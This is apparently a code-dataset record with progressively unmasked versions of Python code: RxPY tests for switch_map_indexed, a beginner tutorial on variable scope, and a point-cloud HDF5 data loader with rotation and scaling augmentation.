"step-1": "<mask token>\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n <mask token>\n <mask token>\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-2": "<mask token>\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = 'ABC'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_error(430, ex))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_error(430, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 
ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-3": "<mask token>\non_next = ReactiveTest.on_next\non_completed = ReactiveTest.on_completed\non_error = ReactiveTest.on_error\nsubscribe = ReactiveTest.subscribe\nsubscribed = ReactiveTest.subscribed\ndisposed = ReactiveTest.disposed\ncreated = ReactiveTest.created\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = 'ABC'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_error(430, ex))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_error(430, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do 
not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-4": "import unittest\nfrom reactivex import interval\nfrom reactivex import operators as ops\nfrom reactivex.testing import ReactiveTest, TestScheduler\nfrom reactivex.testing.marbles import marbles_testing\nfrom reactivex.testing.subscription import Subscription\non_next = ReactiveTest.on_next\non_completed = ReactiveTest.on_completed\non_error = ReactiveTest.on_error\nsubscribe = ReactiveTest.subscribe\nsubscribed = ReactiveTest.subscribed\ndisposed = ReactiveTest.disposed\ncreated = ReactiveTest.created\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = 'ABC'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_error(430, ex))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_error(430, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = 
scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' ---a---b------c-----', {'a': cold(\n ' --1--2', None, None), 'b': cold(' --1-2-3-4-5|',\n None, None), 'c': cold(' --1--2', None, None)\n }, None)\n expected = exp(' -----1---1-2-3--1--2', None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-5": "import unittest\n\nfrom reactivex import interval\nfrom reactivex import operators as ops\nfrom reactivex.testing import ReactiveTest, TestScheduler\nfrom reactivex.testing.marbles import marbles_testing\nfrom reactivex.testing.subscription import Subscription\n\non_next = ReactiveTest.on_next\non_completed = ReactiveTest.on_completed\non_error = ReactiveTest.on_error\nsubscribe = ReactiveTest.subscribe\nsubscribed = ReactiveTest.subscribed\ndisposed = ReactiveTest.disposed\ncreated = ReactiveTest.created\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(\n on_next(300, \"a\"),\n on_next(400, \"b\"),\n on_next(500, \"c\"),\n )\n\n def create_inner(x: str, i: int):\n def create_changing(j: int):\n return (i, j, x)\n\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n\n results = scheduler.start(create, disposed=580)\n # (i, j, x): i is the index of the outer emit;\n # j is the value of the inner interval;\n # x is the value of the outer emission\n assert results.messages == [\n on_next(320, (0, 0, \"a\")),\n on_next(340, (0, 1, \"a\")),\n on_next(360, (0, 2, \"a\")),\n on_next(380, (0, 3, \"a\")),\n on_next(420, (1, 0, \"b\")),\n on_next(440, (1, 1, \"b\")),\n on_next(460, (1, 2, \"b\")),\n on_next(480, (1, 3, \"b\")),\n on_next(520, (2, 0, \"c\")),\n on_next(540, (2, 1, \"c\")),\n on_next(560, (2, 2, \"c\")),\n ]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = \"ex\"\n scheduler = TestScheduler()\n sources = [\n scheduler.create_cold_observable(on_next(100, \"a\"), on_next(300, \"aa\")),\n scheduler.create_cold_observable(on_next(50, \"b\"), on_error(120, ex)),\n scheduler.create_cold_observable(\n on_next(50, \"wont happen\"), on_error(120, \"no\")\n ),\n ]\n xs = scheduler.create_hot_observable(\n on_next(\n 250,\n 0,\n ),\n on_next(400, 1),\n on_next(\n 550,\n 2,\n ),\n )\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [\n on_next(350, \"a\"),\n on_next(450, \"b\"),\n on_error(520, ex),\n ]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n\n def test_switch_map_indexed_outer_throws(self):\n \"\"\"Outer throwing unsubscribes from all\"\"\"\n ex = \"ABC\"\n scheduler = TestScheduler()\n sources = [\n scheduler.create_cold_observable(on_next(100, \"a\"), on_next(300, \"aa\")),\n scheduler.create_cold_observable(on_next(50, \"b\"), on_error(120, ex)),\n scheduler.create_cold_observable(\n on_next(50, \"wont happen\"), on_error(120, \"no\")\n ),\n ]\n xs = scheduler.create_hot_observable(\n on_next(\n 250,\n 0,\n ),\n on_next(400, 1),\n on_error(430, ex),\n )\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [\n on_next(350, \"a\"),\n on_error(430, ex),\n ]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 430)]\n assert sources[2].subscriptions == []\n\n def 
test_switch_map_indexed_no_inner(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_completed(500))\n # Fake inner which should never be subscribed to\n sources = [scheduler.create_cold_observable(on_next(20, 2))]\n\n def create_inner(_x: int, i: int):\n return sources[i]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [on_completed(500)]\n assert xs.subscriptions == [Subscription(200, 500)]\n assert sources[0].subscriptions == []\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(\n on_next(300, \"d\"),\n on_next(330, \"f\"),\n on_completed(540),\n )\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n\n results = scheduler.start(create)\n assert results.messages == [\n on_next(320, (0, 0, \"d\")),\n on_next(350, (1, 0, \"f\")),\n on_next(\n 370, (1, 1, \"f\")\n ), # here the current inner is unsubscribed but not the outer\n on_completed(540), # only outer completion affects\n ]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(\n \" ---a---b------c-----\",\n {\n \"a\": cold(\" --1--2\", None, None),\n \"b\": cold(\" --1-2-3-4-5|\", None, None),\n \"c\": cold(\" --1--2\", None, None),\n },\n None,\n )\n expected = exp(\" -----1---1-2-3--1--2\", None, None)\n result = start(xs.pipe(ops.switch_map_indexed()))\n assert result == expected\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
'''
# VariableScope.py
#
# Written by leezhm on 13th March, 2012.
#
# Copyright (C) leezhm(c)126.com. All Right Reserved.
#
# For Chapter 6 Dragon Realm
#
# <<Invent Your Own Computer Games with Python>>
'''
print('Why not ?')
print(True and not False)
# A global variable named "spam"
spam = 1208
# This block doesn't run until funky() is called.
def funky() :
# We read the global variable's value:
# print(spam)
# We create a local variable named "spam"
# instead of changing the value of the global variable "spam"
spam = 302
# The name "spam" now refers to the local variable only
# for the rest of this function:
print(spam)
# Call the function funky():
funky()
# The global variable was not changed in funky():
print(spam)
# Function with parameters
def sayHello(name) :
print('Hello, ' + name)
print('Say hello to Alice.')
fizzy = 'Alice'
sayHello(fizzy)
print('Do not forget to say hello to Bob.')
sayHello('Bob')
sayHello('Lee')
def spam(myName) :
print('Hello, ' + myName)
myName = 'Waffles'
print('Your new name is ' + myName)
myName = 'Albert'
spam(myName)
print('Howdy, ' + myName)
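# A short follow-up sketch (not in the original file): the global statement is
# how a function rebinds the module-level name instead of shadowing it with a
# local, which is what happened inside funky() and spam() above.
eggs = 1208
def change_eggs():
    global eggs  # without this line, the assignment below would create a local
    eggs = 99
change_eggs()
print(eggs)  # 99 -- the module-level variable really did change this time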
|
normal
|
{
"blob_id": "6af5faaaa9d894dd2b882cfe1bb8b8225780743c",
"index": 630,
"step-1": "<mask token>\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\n<mask token>\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\n<mask token>\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\n<mask token>\n\n\ndef spam(myName):\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint('Why not ?')\nprint(True and not False)\n<mask token>\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\nfunky()\nprint(spam)\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\nprint('Say hello to Alice.')\n<mask token>\nsayHello(fizzy)\nprint('Do not forget to say hello to Bob.')\nsayHello('Bob')\nsayHello('Lee')\n\n\ndef spam(myName):\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\n\n<mask token>\nspam(myName)\nprint('Howdy, ' + myName)\n",
"step-4": "<mask token>\nprint('Why not ?')\nprint(True and not False)\nspam = 1208\n\n\ndef funky():\n spam = 302\n print(spam)\n\n\nfunky()\nprint(spam)\n\n\ndef sayHello(name):\n print('Hello, ' + name)\n\n\nprint('Say hello to Alice.')\nfizzy = 'Alice'\nsayHello(fizzy)\nprint('Do not forget to say hello to Bob.')\nsayHello('Bob')\nsayHello('Lee')\n\n\ndef spam(myName):\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\n\nmyName = 'Albert'\nspam(myName)\nprint('Howdy, ' + myName)\n",
"step-5": "'''\n# VariableScope.py\n#\n# Written by leezhm on 13th March, 2012.\n#\n# Copyright (C) leezhm(c)126.com. All Right Reserved.\n#\n# For Chapter 6 Dragon Realm\n#\n# <<Invent Your Own Computer Games with Python>>\n'''\n\nprint('Why not ?')\n\nprint(True and not False)\n\n# A global variable named \"spam\"\nspam = 1208\n\n# This block doesn't run until funky() is called.\ndef funky() :\n # We read the global variable's value:\n # print(spam)\n\n # We create a local variable named \"spam\"\n # instead of changing the value of the global variable \"spam\"\n spam = 302\n\n # The name \"spam\" now refers to the local variable only\n # for the rest of this function:\n print(spam)\n\n# Call the function funky():\nfunky()\n\n# The global variable was not changed in funky():\nprint(spam)\n\n# Function with parameters\ndef sayHello(name) :\n print('Hello, ' + name)\n\nprint('Say hello to Alice.')\nfizzy = 'Alice'\nsayHello(fizzy)\nprint('Do not forget to say hello to Bob.')\nsayHello('Bob')\n\nsayHello('Lee')\n\ndef spam(myName) :\n print('Hello, ' + myName)\n myName = 'Waffles'\n print('Your new name is ' + myName)\n\nmyName = 'Albert'\nspam(myName)\nprint('Howdy, ' + myName)",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class ModelFetcher(object):
<|reserved_special_token_0|>
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ModelFetcher(object):
def __init__(self, fname, batch_size, down_sample=10, do_standardize=
True, do_augmentation=False):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, 'r') as f:
self._train_data = np.array(f['tr_cloud'])
self._train_label = np.array(f['tr_labels'])
self._test_data = np.array(f['test_cloud'])
self._test_label = np.array(f['test_labels'])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (lambda x: augment(self.prep1(x))
) if do_augmentation else self.prep1
assert len(self._train_data
) > self.batch_size, 'Batch size larger than number of training examples'
self.perm = np.random.permutation(self._train_data.shape[1])[::self
.down_sample]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def rotate_z(theta, x):
theta = np.expand_dims(theta, 1)
outz = np.expand_dims(x[:, :, 2], 2)
sin_t = np.sin(theta)
cos_t = np.cos(theta)
xx = np.expand_dims(x[:, :, 0], 2)
yy = np.expand_dims(x[:, :, 1], 2)
outx = cos_t * xx - sin_t * yy
outy = sin_t * xx + cos_t * yy
return np.concatenate([outx, outy, outz], axis=2)
def augment(x):
bs = x.shape[0]
min_rot, max_rot = -0.1, 0.1
thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi
rotated = rotate_z(thetas, x)
min_scale, max_scale = 0.8, 1.25
scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale
return rotated * scale
<|reserved_special_token_0|>
class ModelFetcher(object):
def __init__(self, fname, batch_size, down_sample=10, do_standardize=
True, do_augmentation=False):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, 'r') as f:
self._train_data = np.array(f['tr_cloud'])
self._train_label = np.array(f['tr_labels'])
self._test_data = np.array(f['test_cloud'])
self._test_label = np.array(f['test_labels'])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (lambda x: augment(self.prep1(x))
) if do_augmentation else self.prep1
assert len(self._train_data
) > self.batch_size, 'Batch size larger than number of training examples'
self.perm = np.random.permutation(self._train_data.shape[1])[::self
.down_sample]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
import numpy as np
